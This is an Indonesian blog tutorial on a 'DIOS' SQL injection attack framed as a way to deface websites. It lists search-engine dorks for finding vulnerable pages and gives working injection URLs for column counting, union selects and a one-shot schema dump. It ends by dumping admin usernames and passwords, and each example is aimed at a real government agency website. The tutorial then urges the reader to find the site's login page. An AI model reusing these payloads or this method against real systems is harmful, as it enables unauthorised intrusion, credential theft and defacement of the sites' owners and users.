Tutorial - Cara SQL injection dengan Dios Lengkap

  • Deviant Design Merupakan Layanan Jasa Desain dan Social Media Management Yang Mempunyai Pusat Di Jember. Dengan layanan yang murah, cepat dan pastinya dengan kualitas kelas atas. Mampu mengatur segala kebutuhanmu dalam mengelola social media.


Keyword : SQLi With Dios, Dios SQL injection, SQLinjection Dios, Dios SQLinjection, Cara SQLi Dios, Tutorial SQLi Dios, Tutorial SQL injection Dios, Cara Deface SQL injection.

Dork :

inurl:specials.php?id=
Inurl:/products.php?id=
Inurl:/cart.php?id=
Inurl:/shop.php?id=
Inurl:/news.php?id=
inurl:/detail_berita.php?id=


Tutorial :

1.Cari Website yang memiliki kerentanan SQLinjection


2.Cek apakah website tersebut memiliki kerentanan SQLinjection (vuln) dengan menggunakan tanda petik (') diakhir angka pada url.

Contoh :
https://bpbd.cianjurkab.go.id/contents/detail_berita.php?id=31'


Ciri-ciri website mempunyai kerentanan SQL injection:

  • You have an error in your SQL syntax;
  • Warning: mysql_fetch_array()
  • Bagian web ada yang hilang/blank



3.Melakukan Order By (Ketika melakukan perintah +order+by+1--+- kita akan mendapati tampilan normal) 
Contoh :
https://bpbd.cianjurkab.go.id/contents/detail_berita.php?id=31'+order+by+1--+-


4.Lakukan Perintah order by sampai mendapati situs error kembali

+order+by+1--+-      > NORMAL
+order+by+2--+-      > NORMAL
+order+by+3--+-      > NORMAL
+order+by+4--+-      > NORMAL
+order+by+5--+-      > NORMAL
+order+by+6--+-      > NORMAL
+order+by+7--+-      > ERROR/BLANK


*Jika Error ada pada order by 7 berarti situs memiliki jumlah kolom sebanyak 6

5.Lakukan Union Select untuk mendapat angka injeksi

Contoh :

https://bpbd.cianjurkab.go.id/contents/detail_berita.php?id=-31%27+union+select+1,2,3,4,5,6--+-




*Pada kasus ini angka yang dapat diinjeksi adalah 4 dan 5

6.Masukkan Dios pada salah satu angka tersebut (saya menggunakan angka 5)

/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/


Contoh :


https://bpbd.cianjurkab.go.id/contents/detail_berita.php?id=-31%27+union+select+1,2,3,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/
,5,6--+-

7.Akan muncul Database dari website tersebut (Nama database Paling kiri), Nama yang ada ditengah itu Table,dan yang paling kiri alah Column. Untuk user dan password biasa berada di table admin


8.Lakukan Dump Database pada di Table t_admin (Tidak semua website sama)

Contoh:

https://bpbd.cianjurkab.go.id/contents/detail_berita.php?id=-31%27+union+select+1,2,3,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(t_admin)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),5,6--+-




Username dan password sudah didapatkan. Sekarang silahkan cari Halaman login pada website target

Artikel Terbaru